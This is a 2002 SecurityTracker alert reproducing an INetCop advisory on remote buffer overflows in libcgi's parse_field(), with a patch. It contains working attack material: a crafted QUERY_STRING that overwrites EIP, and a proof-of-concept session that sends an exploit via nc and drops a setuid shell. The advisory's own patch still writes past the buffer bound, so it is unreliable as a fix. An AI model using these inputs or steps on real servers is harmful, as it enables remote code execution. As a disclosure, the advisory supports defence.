Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
libcgi (TuxBR) Buffer Overflows May Allow Users to Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1005725 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 28 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Advisory: INetCop Security
|
Version(s): 1.0.2, 1.0.3
|
Description: INetCop Security reported several buffer overflows in libcgi (TuxBR). A remote user may be able to execute arbitrary code, depending on the applications that use libcgi.
It is reported that the 'parse_field()' function in 'cgi_lib.c' contains a buffer overflow in a memory operations statment. A user
can cause arbitrary code to be executed.
The impact of this vulnerability depends on the application using libcgi. In a generic
cgi implementation using libcgi, a remote user could cause arbitrary code to be executed with the privileges of the web server.
A
demonstration exploit is described in the Source Message.
|
Impact: A remote user may be able to cause a cgi application based on libcgi to execute arbitrary code. The code would likely run with the privileges of the web server.
|
Solution: No solution was available at the time of this entry.
The author of the report has provided an unofficial patch, available in the Source Message.
|
Vendor URL: www.tuxbr.com.br/projects.html (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: "dong-h0un U" <xploit@hackermail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 28 Nov 2002 15:55:48 +0800
From: "dong-h0un U" <xploit@hackermail.com>
Subject: Remote Multiple Buffer Overflow(s) vulnerability in Libcgi-tuxbr
|
========================================
INetCop Security Advisory #2002-0x82-008
========================================
* Title: Remote Multiple Buffer Overflow(s) vulnerability in Libcgi-tuxbr.
0x01. Description
LIBCGI is a simple of functions to create CGI programs in C.
It provides support for both GET and POST request methods,
parsing data, an URLDecode function, access to MySQL functions,
and excellent documentation.
Vulnerability happens because of 'parse_field()' function.
It's in 129 lines of 'cgi_lib.c' code.
Let's examine. :-)
__
129 void parse_field(char *field, char *rtnfield)
...
132 char *ptr,
133 *endptr,
134 tmp_field[128];
...
137 sprintf(tmp_field,"%s=",field); // "field1="
138
139 if((ptr=strstr(req_http,tmp_field))!=NULL)
140 {
141 ptr+=strlen(tmp_field); // "[value]&field2=[value2]&field3=[valu
e3]"
142
143 if((endptr=strchr(ptr,'&'))!=NULL) // "&field2=[value2]&fiel
d3=[value3]"
144 {
145 memmove(rtnfield, ptr, (endptr - ptr)+1); // here.
146 rtnfield[(endptr - ptr)]='\0';
147 }
...
--
Attacker can change flowing of program easily in remote.
0x02. Vulnerable Packages
Vendor site: http://www.tuxbr.com.br/
libcgi-1.0.3
-libcgi-1.0.3.tar.gz
+Linux
libcgi-1.0.2
-libcgi-1.0.2.tar.gz
0x03. Exploit
There is very good CGI example program.
The CGI program uses parse_field().
Example CGI Program: /cgi-bin/sample3.cgi
let's examine source code.
__
6 char name[64], // 64
7 address[64],
8 tel[64];
...
12 parse_field("name",name); // exploitable !
13 parse_field("address",address);
14 parse_field("telephone",tel);
--
I'm going to do test simply.
See well.
#) Testing. (RedHat Linux 8.0, locale (GNU libc) 2.2.93)
bash$ export QUERY_STRING="name=test&address=test&telephone=test"
bash$ ./sample3.cgi
Content-type: text/plain
*************************** SAMPLE LIBCGIMYSQL *********************
Name=test
Address=test
Telephone=test
*************************** FIM SAMPLE *********************
bash$ export QUERY_STRING="name=`perl -e 'print \"x\"x92'`AAAA&address=test&te
lephone=test"
bash$ gdb -q sample3.cgi
(gdb) r
Starting program: /usr/local/apache/cgi-bin/sample3.cgi
Content-type: text/plain
*************************** SAMPLE LIBCGIMYSQL *********************
Name=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxAAAA
Address=test
Telephone=test
*************************** FIM SAMPLE *********************
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in registros () from /usr/lib/libcgituxbr.so.1
(gdb) bt
#0 0x41414141 in registros () from /usr/lib/libcgituxbr.so.1
#1 0x00000000 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0x40013000 1073819648
edx 0x43218320 1126269728
ebx 0x78787878 2021161080
esp 0xbffffa90 0xbffffa90
ebp 0x78787878 0x78787878
esi 0x78787878 2021161080
edi 0x78787878 2021161080
eip 0x41414141 0x41414141
eflags 0x10282 66178
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)
It's very basic stack based overflow.
Can do exploit in remote.
exploit URL: http://x82.inetcop.org/h0me/c0de/0x82-Remote.tuxbrLibcgi.s
#) Proof of concept
sh-2.05b$ id
uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
sh-2.05b$ cat > /tmp/x82
#!/bin/sh
cp /bin/sh /tmp/nobody-sh
chmod 4755 /tmp/nobody-sh
^C
sh-2.05b$ chmod 755 /tmp/x82
sh-2.05b$ gcc -o 0x82-Remote.tuxbrLibcgi 0x82-Remote.tuxbrLibcgi.s
sh-2.05b$ (./0x82-Remote.tuxbrLibcgi;cat)|nc localhost 80
HTTP/1.1 500 Internal Server Error
Date: Thu, 21 Nov 2002 03:01:46 GMT
Server: Apache/1.3.20 (Unix)
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...
<TITLE>500 Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error</H1>
...
<HR>
<ADDRESS>Apache/1.3.20 Server at localhost.localdomain Port 80</ADDRESS>
</BODY></HTML>
sh-2.05b$
sh-2.05b$ /tmp/nobody-sh -p
nobody-sh-2.05b$ whoami
nobody
nobody-sh-2.05b$
0x04. Patch
=== libcgi.patch ===
--- cgi_lib.c Sat Dec 29 07:10:47 2001
+++ cgi_lib.patch.c Thu Nov 21 23:47:13 2002
@@ -126,7 +126,7 @@
//Faz o parse buscando pelo campo na string de request HTTP
-void parse_field(char *field, char *rtnfield)
+void parse_field(char *field, char *rtnfield, int size)
{
char *ptr,
@@ -142,12 +142,12 @@
if((endptr=strchr(ptr,'&'))!=NULL)
{
- memmove(rtnfield, ptr, (endptr - ptr)+1);
+ memmove(rtnfield, ptr, size-1);//(endptr - ptr)+1);
rtnfield[(endptr - ptr)]='\0';
}
else
{
- memmove(rtnfield, ptr, (strlen(ptr))+1);
+ memmove(rtnfield, ptr, size-1);//(strlen(ptr))+1);
rtnfield[(strlen(ptr))+1]='\0';
}
--- cgi_lib.h Sun Jan 20 06:58:34 2002
+++ cgi_lib.patch.h Thu Nov 21 23:47:05 2002
@@ -37,7 +37,7 @@
/*********************/
void SwapChar(char *pOriginal, char cBad, char cGood);
-void parse_field(char *field, char *rtnfield);
+void parse_field(char *field, char *rtnfield, int size);
void get_request(unsigned int method, char *request);
void URLDecode(unsigned char *pEncoded);
void vExiterr();
--- samples/sample3.c Thu Dec 27 05:52:12 2001
+++ samples/sample3.patch.c Thu Nov 21 23:51:14 2002
@@ -9,9 +9,9 @@
get_request(1,req_http);
- parse_field("name",name);
- parse_field("address",address);
- parse_field("telephone",tel);
+ parse_field("name",name,(int)sizeof(name));
+ parse_field("address",address,(int)sizeof(address));
+ parse_field("telephone",tel,(int)sizeof(tel));
URLDecode(name);
URLDecode(address);
=== eof ===
P.S: Sorry, for my poor english.
--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net
GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
--
|
|
Go to the Top of This SecurityTracker Archive Page
|
